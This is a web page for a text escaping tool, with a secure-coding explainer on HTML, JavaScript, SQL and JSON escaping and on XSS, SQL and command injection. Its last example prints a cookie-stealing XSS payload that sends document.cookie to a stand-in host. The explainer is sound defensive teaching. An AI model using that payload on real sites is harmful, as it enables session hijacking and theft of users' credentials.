Text Escape/Unescape

Escape and unescape text for various formats

Original Text
Escaped Text
Understanding Text Escaping
TL;DR

Text escaping converts special characters into safe sequences to prevent them from being interpreted as code. It's the first line of defense against injection attacks.

What is Text Escaping?

Text escaping is the process of replacing special characters with safe representations so they are treated as literal data rather than executable code or structural syntax. Every language and format has characters with special meaning — HTML uses < and > for tags, SQL uses ' for string delimiters, JSON uses " and \ for strings. When these characters appear in user-provided data, they must be escaped to prevent them from breaking the format or, worse, being interpreted as instructions.

Escaping is conceptually simple: you substitute each dangerous character with a harmless equivalent that produces the same visual output without triggering any special behavior. In HTML, < becomes &lt;. In JSON, a double quote inside a string becomes \". In SQL, a single quote becomes '' (doubled). The specific substitution rules depend entirely on the context.

The failure to properly escape text is one of the most exploited vulnerability classes in software history. Cross-Site Scripting (XSS), SQL injection, command injection, and CSV injection all stem from inserting untrusted data into a structured context without appropriate escaping.

Context-Specific Escaping

There is no single “escape” function that works everywhere. Each output context has its own set of special characters and corresponding escape rules. Using the wrong escaping for the context provides no protection.

HTML Escaping

HTML escaping converts characters that have meaning in HTML markup into their entity equivalents:

CharacterHTML EntityReason
<&lt;Starts an HTML tag
>&gt;Ends an HTML tag
&&amp;Starts an HTML entity
"&quot;Delimits attribute values
'&#x27;Delimits attribute values (alternate)

JavaScript String Escaping

When embedding data inside a JavaScript string (e.g., in a <script> block or an event handler), different rules apply:

CharacterEscapeReason
\\\Escape character itself
"\"String delimiter
'\'String delimiter
Newline\nBreaks string literal
</script><\/script>Ends the script block prematurely

SQL Escaping

SQL injection remains one of the most dangerous vulnerabilities. While parameterized queries (prepared statements) are the correct solution, understanding SQL escaping helps explain why:

CharacterEscapeReason
''' (doubled)String delimiter in SQL
\\\Escape character (MySQL)
%\%Wildcard in LIKE clauses

JSON Escaping

When embedding strings in JSON, the following characters must be escaped with a backslash:

CharacterEscapeReason
"\"String delimiter
\\\Escape character
/\/Optional, prevents </script> issues
Newline\nControl character
Tab\tControl character

Why Escaping Matters

Escaping is not about aesthetics or format compliance — it is a critical security boundary. When user-controlled data crosses from the data layer into a code layer (HTML, SQL, JavaScript, shell commands) without escaping, the user’s data can become executable instructions.

Cross-Site Scripting (XSS)

XSS is the most common web vulnerability. It occurs when a web application includes untrusted data in HTML output without escaping. An attacker injects JavaScript that executes in other users’ browsers, enabling cookie theft, session hijacking, defacement, and phishing.

There are three types:

  • Reflected XSS: The malicious script is part of the URL and reflected back in the page
  • Stored XSS: The script is permanently stored (e.g., in a database comment field) and served to every visitor
  • DOM-based XSS: The injection happens entirely in client-side JavaScript without server involvement

SQL Injection

SQL injection occurs when user input is concatenated into a SQL query without escaping or parameterization. An attacker can modify the query to bypass authentication, extract data, modify records, or even execute system commands.

Command Injection

When user input is passed to shell commands (e.g., via exec() or backticks), characters like ;, |, and $() can chain additional commands. The solution is to use library functions that avoid the shell entirely, or to strictly validate and escape input.

Common Use Cases

  • Rendering user content in HTML: Blog comments, forum posts, profile descriptions, and any other user-generated content must be HTML-escaped before insertion into a page to prevent XSS
  • Building SQL queries: Although parameterized queries are preferred, understanding escaping is essential for debugging, logging, and working with legacy systems that build SQL dynamically
  • Generating JSON responses: When constructing JSON strings manually (without a serializer), string values must be properly escaped to produce valid JSON and prevent injection
  • Embedding data in JavaScript: Server-rendered pages that inject data into <script> blocks must escape the data for the JavaScript context, not the HTML context
  • CSV export: When generating CSV files from user data, fields containing commas, quotes, or newlines must be quoted and escaped to prevent formula injection and parsing errors

Try These Examples

Properly Escaped HTML Valid

The angle brackets < and > are escaped as &lt; and &gt;, and the single quote is preserved. The browser renders the literal text '<script>alert(hi)</script>' instead of executing it as JavaScript.

&lt;script&gt;alert('hi')&lt;/script&gt;
Unescaped User Input (XSS Vulnerability) Invalid

Raw user input injected into HTML without escaping. A browser would execute this JavaScript, sending the user's cookies to an attacker. This is a classic Cross-Site Scripting (XSS) attack.

<script>document.location='https://evil.com/steal?c='+document.cookie</script>